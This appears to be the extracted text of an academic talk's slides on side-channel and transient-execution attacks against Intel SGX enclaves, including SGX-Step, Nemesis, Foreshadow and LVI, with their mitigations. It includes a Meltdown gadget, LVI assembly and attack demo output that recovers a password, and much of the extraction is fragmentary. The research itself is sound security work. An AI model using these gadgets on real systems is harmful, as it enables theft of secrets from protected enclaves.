## 

### Microarchitectural Side-Channel Attacks for Privileged Software Adversaries

Jo Van Bulck

STM PhD Award Talk (online), October 8, 2021

A imec-DistriNet, KU Leuven ☑ jo.vanbulck@cs.kuleuven.be ¥ jovanbulck



"Complexity is the worst enemy of security, and our systems are getting more complex all the time."

- Bruce Schneier



https://informationisbeautiful.net/visualizations/million-lines-of-code/



#### Enclaved execution: Reducing attack surface



Traditional layered designs: large trusted computing base

#### Enclaved execution: Reducing attack surface



Intel SGX promise: hardware-level isolation and attestation

#### Enclaved execution: Privileged side-channel attacks



**Game-changer:** Untrusted OS  $\rightarrow$  new class of powerful side channels!





#### Evolution of "side-channel attack" research



Based on github.com/Pold87/academic-keyword-occurrence and xkcd.com/1938/

#### Evolution of "side-channel attack" research



Based on github.com/Pold87/academic-keyword-occurrence and xkcd.com/1938/

#### Side-channel attacks and trusted computing (focus of this PhD)



Based on github.com/Pold87/academic-keyword-occurrence and xkcd.com/1938/



1. Which novel privileged side channels exist?



2. How well can they be exploited in practice?

3. What can be leaked?

- 1. Which novel privileged side channels exist?
  - $\rightarrow$  We uncover previously unknown attack avenues



- 2. How well can they be exploited in practice?
  - $\rightarrow\,$  We develop new techniques and practical attack frameworks
- 3. What can be leaked?
  - $\rightarrow$  We leak metadata and data



# Idea 1: Privileged interrupts for side-channel amplification































Overall execution time reveals correctness of individual password bytes!

#### Building the side-channel oracle with execution timing?



#### Building the side-channel oracle with execution timing?

**Too noisy:** modern x86 processors are lightning fast...



#### Analogy: Studying galloping horse dynamics



https://en.wikipedia.org/wiki/Sallie\_Gardner\_at\_a\_Gallop



Copyright, 1878, by MUYBRIDGE.

MORSE'S Gallery, 417 Montgomery St., San Francisco.

THE HORSE IN MOTION.

Illustrated by MUYBRIDGE.

AUTOMATIC ELECTRO-PHOTOGRAPH.

"SALLE GARDNER," owned by LELAND STANFORD; running at a 1.40 gait over the Palo Alto track, 19th June, 1878.



https://github.com/jovanbulck/sgx-step

⊙ Unwatch → 27 ☆ Star 312 양 Fork 63









#### SGX-Step: Executing enclaves one instruction at a time



#### SGX-Step: Executing enclaves one instruction at a time



#### Demo: Building a deterministic password oracle with SGX-Step

```
[idt.c] DTR.base=0xfffffe000000000/size=4095 (256 entries)
[idt.c] established user space IDT mapping at 0x7f7ff8e9a000
[idt.c] installed asm IRO handler at 10:0x56312d19b000
[idt.c] IDT[ 45] @0x7f7ff8e9a2d0 = 0x56312d19b000 (seg sel 0x10): p=1: dpl=3: type=14: ist=0
[file.c] reading buffer from '/dev/cpu/1/msr' (size=8)
[apic.c] established local memory mapping for APIC BASE=0xfee00000 at 0x7f7ff8e99000
[apic.c] APIC ID=2000000: LVTT=400ec: TDCR=0
[apic.c] APIC timer one-shot mode with division 2 (lvtt=2d/tdcr=0)
[main.c] recovering password length
[attacker] steps=15: guess='******
[attacker] found pwd len = 6
[main.c] recovering password bytes
                          [attacker] steps=35; guess='SECRET' --> SUCCESS
[apic.c] Restored APIC LVTT=400ec/TDCR=0)
[file.c] writing buffer to '/dev/cpu/1/msr' (size=8)
```

[main.c] all done: counted 2260/2183 IROs (AEP/IDT)

io@breuer:~/sqx-step-demo\$

14

# **ALL YOUR PASSWORDS**

# ARE BELONG TO US

makeameme.org

|     |                  |                     | APIC |            | PTE        |            | Desc |            |            |               |
|-----|------------------|---------------------|------|------------|------------|------------|------|------------|------------|---------------|
| Yr  | Attack           | Temporal resolution | IRO  | ·181       | #PF        | A/D        | PPN  | GDT        | IDT        | Drv           |
| '15 | Ctrl channel     | ~ Page              | 0    | 0          | ٠          | 0          | 0    | 0          | ٠          | / 🖷           |
| '16 | AsyncShock       | ~ Page              | 0    | 0          | ٠          | 0          | 0    | 0          | $^{\circ}$ | - &           |
| '17 | CacheZoom        | <mark>≯</mark> > 1  | ٠    | 0          | 0          | 0          | 0    | 0          | 0          | ∠ ∆           |
| '17 | Hahnel et al.    | <b>×</b> 0 − > 1    | ٠    | 0          | 0          | 0          | 0    | 0          | ٠          | 1             |
| '17 | BranchShadow     | 🗡 5 - 50            | ٠    | 0          | 0          | 0          | 0    | 0          | 0          | 🗡 \Lambda     |
| '17 | Stealthy PTE     | ~ Page              | 0    | ٠          | 0          | ٠          | 0    | $^{\circ}$ | ٠          | 🗸 🛆           |
| '17 | DarkROP          | ~ Page              | 0    | 0          | ٠          | 0          | 0    | 0          | 0          | 🗸 🔕           |
| '17 | SGX-Step         | ✓ 0 - 1             | ٠    | 0          | ٠          | ٠          | 0    | 0          | 0          | 1-            |
| '18 | Off-limits       | ✓ 0 - 1             | ٠    | 0          | ٠          | 0          | 0    | •          | 0          | 1-5           |
| '18 | Single-trace RSA | ~ Page              | 0    | 0          | •          | 0          | 0    | 0          | 0          | 1 📲           |
| '18 | Foreshadow       | ✓ 0 - 1             | ۲    | 0          | •          | 0          | •    | 0          | 0          | 1-5           |
| '18 | SgxPectre        | ~ Page              | 0    | 0          | ٠          | 0          | 0    | 0          | 0          | ∠ ∆           |
| '18 | CacheQuote       | <mark>≯</mark> > 1  | ٠    | 0          | 0          | 0          | 0    | 0          | 0          | \[ \lambda \] |
| '18 | SGXlinger        | <mark>≯</mark> > 1  | ٠    | $^{\circ}$ | $^{\circ}$ | $^{\circ}$ | 0    | 0          | $^{\circ}$ | 🗡 \Lambda     |
| '18 | Nemesis          | ✓ 1                 | ٠    | 0          | ٠          | ٠          | 0    | 0          | ٠          | 1-#           |

|     |                  |                     | AF         | PIC     |         | РТЕ        |     | De      | esc        |           |
|-----|------------------|---------------------|------------|---------|---------|------------|-----|---------|------------|-----------|
| Yr  | Attack           | Temporal resolution | IRO        | ·1P1    | #PF     | A/D        | PPN | GDT     | IDT        | Drv       |
| '19 | Spoiler          | ✓ 1                 | ٠          | 0       | 0       | ٠          | 0   | 0       | ٠          | 1-1       |
| '19 | ZombieLoad       | ✓ 0 - 1             | •          | 0       | •       | •          | 0   | 0       | •          | 1 -#      |
| '19 | Tale of 2 worlds | ✓ 1                 | ٠          | 0       | •       | ٠          | 0   | 0       | ٠          | 1-5       |
| '19 | MicroScope       | ~ 0 - Page          | 0          | 0       | ٠       | 0          | 0   | 0       | 0          | X \Lambda |
| '20 | Bluethunder      | ✓ 1                 | ۲          | $\circ$ | $\circ$ | 0          | 0   | 0       | ٠          | 1-5       |
| '20 | Big troubles     | ~ Page              | $^{\circ}$ | 0       | ٠       | $\bigcirc$ | 0   | $\circ$ | $^{\circ}$ | 1-1       |
| '20 | Viral primitive  | ✓ 1                 | ٠          | 0       | ٠       | ٠          | 0   | $\circ$ | ٠          | 1-1       |
| '20 | CopyCat          | ✓ 1                 | ٠          | 0       | ٠       | ٠          | 0   | $\circ$ | ٠          | 1-1       |
| '20 | LVI              | ✓ 1                 | ۲          | $\circ$ | •       | ٠          | •   | 0       | ٠          | 1 -       |
| '20 | A to Z           | ~ Page              | 0          | $\circ$ | •       | 0          | 0   | 0       | 0          | 1 -       |
| '20 | Frontal          | ✓ 1                 | ۲          | $\circ$ | •       | ٠          | 0   | 0       | ۲          | 1 -       |
| '20 | CrossTalk        | ✓ 1                 | ۲          | $\circ$ | •       | 0          | 0   | 0       | ۲          | 1 -#      |
| '20 | Online template  | ~ Page              | 0          | 0       | ٠       | 0          | 0   | 0       | 0          | 1-1       |
| '20 | Déjà Vu NSS      | ~ Page              | 0          | 0       | ٠       | 0          | 0   | 0       | 0          | 1-#       |



# Idea 2: Privileged interrupts for microarchitectural leakage

#### Elementary CPU behavior: Stored program computer



#### Back to basics: Fetch-decode-execute

Interrupts: Asynchronous events, handled on instruction retirement



#### Back to basics: Fetch-decode-execute

Timing leak: IRQ response time depends on current instruction(!)



#### Wait a cycle: Interrupt latency as a side channel



# **TIMING LEAKS**

EVERYWHERE

imgflip.com

### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Enclave x-ray: Start-to-end trace enclaved execution

### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Enclave x-ray: Keymap bit traversal (ground truth)

#### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Intel SGX microbenchmarks: Measuring x86 cache misses





Instruction (interrupt number)



Instruction (interrupt number)





Instruction (interrupt number)

### De-anonymizing SGX enclave lookups with interrupt latency

Adversary: Infer secret lookup in known sequence (e.g., DNA)



### De-anonymizing SGX enclave lookups with interrupt latency



### De-anonymizing SGX enclave lookups with interrupt latency



22



Idea 3: Privileged page tables for transient data leakage

### Thesis outline: Privileged side channels (interrupt latency)



### Thesis outline: Privileged side channels (page-table accesses)



### Thesis outline: Transient-execution attacks (Foreshadow, LVI)



# WHAT IF I TOLD YOU

## **YOU CAN CHANGE RULES MID-GAME**

E PHANTOM TROLLEY ISN'T PPOSED TO TOUCH ANYONE. IT TURNS OUT YOU CAN ILL USE IT TO DO STUFF. ND IT CAN DRIVE IROUGH WALLS.





#### Transient-execution attacks: Welcome to the world of fun!



#### The transient-execution zoo

#### https://transient.fail



















### inside<sup>™</sup>

### inside<sup>™</sup>

inside<sup>™</sup>



#### **Unauthorized access**

|   | Listing 1: x86 assembly |   | Listing 2: C code.                  |  |  |  |  |
|---|-------------------------|---|-------------------------------------|--|--|--|--|
| 1 | meltdown: 1             |   | void meltdown(                      |  |  |  |  |
| 2 | // %rdi: oracle         | 2 | uint8_t *oracle,                    |  |  |  |  |
| 3 | // %rsi: secret_ptr     | 3 | uint8_t *secret_ptr)                |  |  |  |  |
| 4 |                         | 4 | {                                   |  |  |  |  |
| 5 | movb (%rsi), %al        | 5 | <pre>uint8_t v = *secret_ptr;</pre> |  |  |  |  |
| 6 | shl \$0×c, %ra×         | 6 | $v = v * 0 \times 1000;$            |  |  |  |  |
| 7 | movq (%rdi, %rax), %rdi | 7 | uint64_t o = oracle[v];             |  |  |  |  |
| 8 | retq                    | 8 | }                                   |  |  |  |  |





Unauthorized access

#### **Transient out-of-order window**









Unauthorized access

Transient out-of-order window

Exception (discard architectural state)

| Listing 1: $\times 86$ assembly. |                         |   | Listing 2: C code.                  |  |  |  |  |
|----------------------------------|-------------------------|---|-------------------------------------|--|--|--|--|
| 1                                | meltdown :              | 1 | void meltdown(                      |  |  |  |  |
| 2                                | // %rdi: oracle         | 2 | uint8_t *oracle,                    |  |  |  |  |
| 3                                | // %rsi: secret_ptr     | 3 | uint8_t *secret_ptr)                |  |  |  |  |
| 4                                |                         | 4 | {                                   |  |  |  |  |
| 5                                | movb (%rsi), %al        | 5 | <pre>uint8_t v = *secret_ptr;</pre> |  |  |  |  |
| 6                                | shl \$0×c, %ra×         | 6 | $v = v * 0 \times 1000;$            |  |  |  |  |
| 7                                | movq (%rdi, %rax), %rdi | 7 | uint64_t o = oracle[v];             |  |  |  |  |
| 8                                | retq                    | 8 | }                                   |  |  |  |  |







Unauthorized access

Transient out-of-order window

**Exception handler** 

|   | Listing 1: $\times$ 86 assembly. | Listing 2: C code.                   |              |
|---|----------------------------------|--------------------------------------|--------------|
| 1 | meltdown :                       | 1 void meltdown(                     | oracle array |
| 2 | // %rdi: oracle                  | 2 uint8_t *oracle,                   |              |
| 3 | // %rsi: secret_ptr              | 3 uint8_t *secret_ptr)               |              |
| 4 |                                  | 4 {                                  |              |
| 5 | movb (%rsi), %al                 | 5 uint8_t v = *secret_ptr;           |              |
| 6 | shl \$0×c, %rax                  | $v = v * 0 \times 1000;$             | cache hit    |
| 7 | movq (%rdi, %rax), %rdi          | <pre>7 uint64_t o = oracle[v];</pre> | · cache hit  |
| 8 | retq                             | 8 }                                  |              |







## inside<sup>™</sup>

## inside<sup>™</sup>

inside<sup>™</sup>

#### Rumors: Meltdown immunity for SGX enclaves?

# Meltdown melted down everything, except for one thing

"[enclaves] remain protected and completely secure"

— International Business Times, February 2018

ANJUNA'S SECURE-RUNTIME CAN PROTECT CRITICAL APPLICATIONS AGAINST THE MELTDOWN ATTACK USING ENCLAVES

"[enclave memory accesses] redirected to an abort page, which has no value" — Anjuna Security, Inc., March 2018

#### Rumors: Meltdown immunity for SGX enclaves?



SPECTRE-LIKE FLAW UNDERMINES INTEL PROCESSORS' MOST SECURE ELEMENT

AN SECURITY DB 14-18 D1:00 PM

I'M SURE THIS WON'T BE THE LAST SUCH PROBLEM —

# Intel's SGX blown wide open by, you guessed it, a speculative execution attack

Speculative execution attacks truly are the gift that keeps on giving.

https://wired.com and https://arstechnica.com





#### Building Foreshadow: Evade SGX abort page semantics



#### Building Foreshadow: Evade SGX abort page semantics



#### **Building Foreshadow: Evade SGX abort page semantics**



#### Foreshadow-SGX: Breaking enclave isolation



#### Foreshadow-NG: Breaking virtual machine isolation





#### Mitigating Foreshadow: Flush CPU microarchitecture



#### Mitigating Foreshadow: Flush CPU microarchitecture

| 10BH | 267 | (IA32_FLUSH_CMD) | Flush Command (WO)<br>Gives software a way to invalidate<br>structures with finer granularity than other<br>architectural methods. | If any one of the<br>enumeration conditions<br>defined bit field positio<br>holds. |
|------|-----|------------------|------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------|
|      |     | 0                | (L1D_FLUSH: Writeback and invalidate the)<br>(L1 data cache)                                                                       | If CPUID.(EAX=07H,<br>ECX=0):EDX[28]=1                                             |
|      |     | 63:1             | Reserved                                                                                                                           |                                                                                    |









inside<sup>™</sup>



### inside<sup>™</sup>

#### Idea: Can we turn Foreshadow around?



#### Outside view

- Meltdown: out-of-reach
- Foreshadow: cache emptied



#### Intra-enclave view

• Access enclave + outside memory

#### Idea: Can we turn Foreshadow around?



#### Outside view

- Meltdown: out-of-reach
- Foreshadow: cache emptied



#### Intra-enclave view

- Access enclave + outside memory
- → Abuse in-enclave code gadgets!

#### Reviving Foreshadow & co. with Load Value Injection (LVI)



#### Reviving Foreshadow & co. with Load Value Injection (LVI)





www.freepik.com

| 80  | •     |                                                               | asm.S (~/sgx-step-fresh/app/lvi/Enclave) - VIM |
|-----|-------|---------------------------------------------------------------|------------------------------------------------|
| E/a | asm.S | main.c                                                        |                                                |
| 28  |       | .global ecall_lvi_sb_rop                                      |                                                |
| 29  |       | # %rdi store_pt                                               |                                                |
| 30  |       | # %rsi oracle_pt                                              |                                                |
| 31  | ecal  | .l_lvi_sb_rop:                                                |                                                |
| 32  |       | mov %rsp, rsp_backup(%rip)                                    |                                                |
| 33  |       | lea page_b(%rip), %rsp                                        |                                                |
| 34  |       | add \$OFFSET, %rsp                                            |                                                |
| 35  |       |                                                               |                                                |
| 36  |       | /* transient delay */                                         |                                                |
| 37  |       | clflush dummy(%rip)                                           |                                                |
| 38  |       | mov dummy(%rip), %rax                                         |                                                |
| 39  |       |                                                               |                                                |
| 40  |       | /* STORE TO USER ADRS */                                      |                                                |
| 41  |       | movq \$'R', (%rdi)                                            |                                                |
| 42  |       | lea ret_gadget(%rip), %rax                                    |                                                |
| 43  |       | movq %rax, 8(%rdi)                                            |                                                |
| 44  |       |                                                               |                                                |
| 45  |       | /* HIJACK TRUSTED LOAD FROM ENCLAVE STACK */                  |                                                |
| 46  |       | <pre>/* should go to do_real_ret; will transiently go t</pre> | o ret_gadget if we fault o:                    |
| 47  |       | pop %rax                                                      |                                                |
|     |       | LFENCE                                                        |                                                |
| 49  |       | notq (%rsp)                                                   |                                                |
| 50  |       | notq (%rsp)                                                   |                                                |
| 51  |       | lfence                                                        |                                                |
| 52  |       | ret                                                           |                                                |
|     | #els  |                                                               |                                                |
| 54  |       | ret                                                           |                                                |
|     | #enc  | 11f                                                           |                                                |
| 56  |       |                                                               |                                                |
| 57  |       | jmp 1b                                                        |                                                |

# 57 1: jmp ro 58 m fence 59 60 do\_real\_ret: 61 mov rsp\_backup(%rip), %rsp 62 ret 63 Enclave/asm.S

#### Mitigating LVI: Fencing vulnerable load instructions



#### Mitigating LVI: Fencing vulnerable load instructions



#### Mitigating LVI: Compiler and assembler support



-mlfence-after-load



-mlvi-hardening



-Qspectre-load

#### <mark>GNU Assembler</mark> Adds New Options For Mitigating Load Value Injection Attack

Written by Michael Larabel in GNU on 11 March 2020 at 02:55 PM EDT. 14 Comments

#### LLVM Lands <mark>Performance-Hitting Mitigation</mark> For Intel LVI Vulnerability

Written by Michael Larabel in Software on 3 April 2020. Page 1 of 3. 20 Comments

#### More Spectre Mitigations in MSVC

March 13th, 2020

#### Intel architectural enclaves: lfence counts

libsgx\_qe.signed.so



#### 23 fences

October 2019—"surgical precision"

#### Intel architectural enclaves: lfence counts

libsgx\_qe.signed.so



#### 23 fences

October 2019—"surgical precision"

March 2020—"big hammer"



#### <mark>GNU Assembler</mark> Adds New Options For Mitigating Load Value Injection Attack

Written by Michael Larabel in GNU on 11 March 2020 at 02:55 PM EDT. 14 Comments

#### The <mark>Brutal Performance Impact</mark> From Mitigating The LVI Vulnerability

Written by Michael Larabel in Software on 12 March 2020. Page 1 of 6. 76 Comments

#### LLVM Lands Performance-Hitting Mitigation For Intel LVI Vulnerability

Written by Michael Larabel in Software on 3 April 2020. Page 1 of 3. 20 Comments

#### Looking At The <mark>LVI Mitigation Impact</mark> On Intel Cascade Lake Refresh

Written by Michael Larabel in Software on 5 April 2020. Page 1 of 5. 10 Comments

- ⇒ **Trusted execution** environments (Intel SGX) ≠ perfect(!)
- ⇒ Importance of fundamental **side-channel research**; no silver-bullet defenses
- $\Rightarrow$  Security **cross-cuts** the system stack: hardware, OS, compiler, application



